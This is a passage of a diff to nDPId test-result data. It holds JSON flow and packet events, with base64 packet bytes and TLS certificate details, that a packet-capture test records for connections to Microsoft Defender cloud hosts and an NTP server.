{"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1626168079986,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079986,"pkt":"8BiYFWV8WNVuaKQACABFAAA0TOVAAG0GzB0ocQovwKgBeQG70p13uqY86tbCUoAS\/\/\/a2QAAAgQFoAEDAwgBAQQC"} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1626168079986,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079986,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KdAbvq1sJSd7qmPVAQEAALmQAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079937,"flow_last_seen":1626168079986,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079986,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":275,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1626168079905,"flow_last_seen":1626168080007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1626168080007,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
-01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":279,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168079937,"flow_last_seen":1626168080036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080036,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
+00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079905,"flow_last_seen":1626168079905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079905,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1626168079905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079905,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KcAbuMyd8CAAAAALAC\/\/\/ChQAAAgQFtAEDAwYBAQgKPdIBvwAAAAAEAgAA"} +00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079937,"flow_last_seen":1626168079937,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079937,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1626168079937,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079937,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KdAbvq1sJRAAAAALAC\/\/+BCAAAAgQFtAEDAwYBAQgKPdIB3wAAAAAEAgAA"} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1626168079957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079957,"pkt":"8BiYFWV8WNVuaKQACABFAAA0g1dAAG0GlasocQovwKgBeQG70pxuzvrNjMnfA4AS\/\/\/QkQAAAgQFoAEDAwgBAQQC"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1626168079957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079957,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KcAbuMyd8Dbs76zlAQEAABUQAA"} 
+00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079905,"flow_last_seen":1626168079957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079957,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1626168079986,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079986,"pkt":"8BiYFWV8WNVuaKQACABFAAA0TOVAAG0GzB0ocQovwKgBeQG70p13uqY86tbCUoAS\/\/\/a2QAAAgQFoAEDAwgBAQQC"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1626168079986,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079986,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KdAbvq1sJSd7qmPVAQEAALmQAA"} 
+00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079937,"flow_last_seen":1626168079986,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079986,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":275,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1626168079905,"flow_last_seen":1626168080007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1626168080007,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, 
ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":279,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168079937,"flow_last_seen":1626168080036,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080036,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080092,"flow_last_seen":1626168080092,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168080092,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":65099,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1626168080092,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168080092,"pkt":"WNVuaKQA8BiYFWV8CABFAABMx3MAAEARqBTAqAF5Ef02+\/5LAHsAONKdIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080092,"flow_last_seen":1626168080092,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168080092,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":65099,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 
00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1626168080122,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168080122,"pkt":"8BiYFWV8WNVuaKQACABFAABMV31AADcR4QoR\/Tb7wKgBeQB7\/ksAOLQqJAED6wAAAAAAAAANU0hNAOSX2YmMm6TtAAAAAAAAAADkl9mQLKsA6OSX2ZAsrLL1"} -00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":288,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080539,"flow_last_seen":1626168080539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168080539,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1626168080539,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168080539,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KeAbvRcN5sAAAAALAC\/\/97\/QAAAgQFtAEDAwYBAQgKPdIENAAAAAAEAgAA"} 
-00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080569,"flow_last_seen":1626168080569,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168080569,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1626168080569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168080569,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KfAbtYRRqJAAAAALAC\/\/+47QAAAgQFtAEDAwYBAQgKPdIEUgAAAAAEAgAA"} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1626168080587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168080587,"pkt":"8BiYFWV8WNVuaKQACABFAAA0frdAAG0GmksocQovwKgBeQG70p4gI5AJ0XDebYAS\/\/9F7gAAAgQFoAEDAwgBAQQC"} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1626168080587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168080587,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KeAbvRcN5tICOQClAQEAB2rQAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168080539,"flow_last_seen":1626168080587,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168080587,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1626168080617,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168080617,"pkt":"8BiYFWV8WNVuaKQACABFAAA0hXNAAG0Gk48ocQovwKgBeQG70p8W6XtBWEUaioAS\/\/+g\/gAAAgQFoAEDAwgBAQQC"} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1626168080617,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168080617,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KfAbtYRRqKFul7QlAQEADRvQAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168080569,"flow_last_seen":1626168080617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168080617,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168080539,"flow_last_seen":1626168080639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080639,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
-01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168080569,"flow_last_seen":1626168080666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080666,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
